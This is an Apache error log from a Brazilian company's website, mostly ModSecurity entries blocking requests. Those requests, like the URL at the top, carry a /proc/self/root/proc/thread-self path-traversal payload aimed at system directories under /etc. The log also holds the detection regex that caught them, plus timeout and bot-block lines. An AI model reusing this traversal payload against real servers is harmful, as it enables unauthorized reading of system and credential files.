https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:52:54.033930 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:53:12.306224 2026] [core:alert] [pid 17653:tid 140411649607424] [client 57.141.18.91:52250] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:53:17.132818 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50400] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:53:39.309877 2026] [core:alert] [pid 15826:tid 140411716749056] [client 57.141.18.73:52754] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:53:40.125780 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50928] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:53:53.921064 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:48108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvj0cdf6f5d65gmYZRmRAAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:54:04.490052 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51518] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:54:04.648529 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:53338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvj3BkFeYa1D6dYQnDhMgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:54:17.400214 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:58476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvj6cdf6f5d65gmYZRmVAAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:54:26.129799 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:54:44.412460 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.244.43:52794] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvkBAkwaGbbGflqUZCvRwAAAM0"]
[Thu Mar 19 08:54:48.165851 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52716] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:55:12.125819 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:55:17.645833 2026] [core:alert] [pid 26799:tid 140411649607424] [client 57.141.18.11:55990] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:55:20.292309 2026] [mime_magic:error] [pid 26799:tid 140411607643904] (70014)End of file found: [client 57.141.18.82:56160] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:55:36.489361 2026] [mime_magic:error] [pid 14269:tid 140411574073088] (70014)End of file found: [client 57.141.18.48:56434] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:55:38.853833 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:56:03.133794 2026] [proxy_fcgi:error] [pid 19093:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:56:23.345227 2026] [mime_magic:error] [pid 27403:tid 140411716749056] (70014)End of file found: [client 57.141.18.122:57552] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:56:29.078152 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55118] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:56:41.942486 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.243.128:55414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvkeV_V7PWP6ixUYl6uogAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:56:42.008672 2026] [mime_magic:error] [pid 19093:tid 140411574073088] (70014)End of file found: [client 57.141.18.109:58074] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:56:49.681633 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:55414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvkgV_V7PWP6ixUYl6uqwAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:56:55.137786 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55856] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:57:09.715559 2026] [core:alert] [pid 17887:tid 140411674785536] [client 57.141.18.64:58854] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:57:26.121788 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56530] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:57:33.323385 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:46042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvkreyqAr6etmhZHNpTtAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:57:37.581912 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.228.61:52596] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvksV_V7PWP6ixUYl6uwgAAAoU"]
[Thu Mar 19 08:57:55.137814 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57176] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:58:03.732426 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:48740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvky_u8EFLIOrSqIpuWHwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:58:25.149854 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:58:52.129850 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58764] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:59:02.202222 2026] [mime_magic:error] [pid 14269:tid 140411716749056] (70014)End of file found: [client 57.141.18.6:33234] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:59:16.130645 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59396] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:59:35.847978 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:45856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvlJ8df6f5d65gmYZRnNwAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:59:38.131864 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:59:45.503197 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.244.43:47422] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvlMda6ubjKNq_cu4ZAjwAAA04"]
[Thu Mar 19 09:00:01.149955 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60554] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:00:01.791690 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:59836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvlQV_V7PWP6ixUYl6vFQAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:00:02.355646 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:59836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvlQl_V7PWP6ixUYl6vFgAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:00:08.857830 2026] [core:alert] [pid 31803:tid 140411725141760] [client 57.141.18.14:34856] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:00:25.158623 2026] [proxy_fcgi:error] [pid 27403:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:32898] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:00:48.147397 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33448] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:00:52.409856 2026] [core:alert] [pid 14269:tid 140411599251200] [client 74.7.243.128:35006] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:01:10.125807 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34002] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:01:21.660967 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:44020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvlkRkFeYa1D6dYQnDiRAAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:01:33.929818 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34476] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:01:53.248176 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:35348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvlseoXxyEfFpUF8f8BMgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:01:58.081930 2026] [proxy_fcgi:error] [pid 19093:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:02:03.671367 2026] [mime_magic:error] [pid 27403:tid 140411674785536] (70014)End of file found: [client 57.141.18.21:37874] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:02:10.539117 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:38950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvlwsdf6f5d65gmYZRnkgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:02:24.157822 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:02:28.521313 2026] [mime_magic:error] [pid 27293:tid 140411666392832] (70014)End of file found: [client 74.7.243.128:49046] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc
[Thu Mar 19 09:02:37.830456 2026] [core:alert] [pid 27403:tid 140411666392832] [client 57.141.18.94:38884] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:02:38.565642 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.228.61:56408] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvl3gbLMZ6AikZjR9VPUAAAABU"]
[Thu Mar 19 09:02:47.140164 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36288] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:03:15.401818 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36908] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:03:46.132712 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:04:20.129780 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38534] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:04:49.045844 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39308] AH01075: Error dispatching request to : (polling)
